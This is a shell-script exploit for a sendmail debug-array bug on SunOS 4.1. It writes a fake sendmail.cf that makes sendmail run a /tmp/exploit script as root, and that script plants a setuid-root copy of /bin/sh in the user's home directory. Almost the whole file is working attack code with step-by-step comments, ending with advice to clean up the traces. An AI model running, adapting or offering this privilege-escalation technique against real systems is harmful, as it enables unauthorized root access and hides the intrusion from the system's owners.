#!/bin/sh
#
# Description: Exploits sendmail vulnerability which allows the changing of
#              arbitrary elements in the debug array.  In this case we
#              change the path of the sendmail configuration file,
#              /etc/sendmail.cf, to eetc/sendmail.cf which allows us to
#              specify our own configuration file.
#
# Newest sendmail bug (SunOS 4.1/sendmail 4.1) - nextpert
#

# create the script that our fake sendmail.cf will run, /tmp/exploit
echo Creating /tmp/exploit, which sendmail will run as root
cat > /tmp/exploit << _EOF_
#!/bin/sh
cp /bin/sh $HOME/root.sh
chown root.staff $HOME/root.sh
chmod 4755 $HOME/root.sh
_EOF_

# allow execution of /tmp/exploit
echo Changing mode of /tmp/exploit to 755
chmod 755 /tmp/exploit

# make fake configuration file
echo Making fake configuration file
mkdir eetc
cat > eetc/sendmail.cf << _EOF_
FV|/tmp/exploit
_EOF_

# run sendmail with the magic number
echo Running sendmail, wait a few seconds, then hit Control-C, if it
echo doesn't exit.
sleep 1
/usr/lib/sendmail -uroot -d4294949608.101 nobody

# if all goes well you will have a setuid root shell sitting in your home
# directory, ~/root.sh, don't forget to clean up /tmp/exploit and
# eetc/sendmail.cf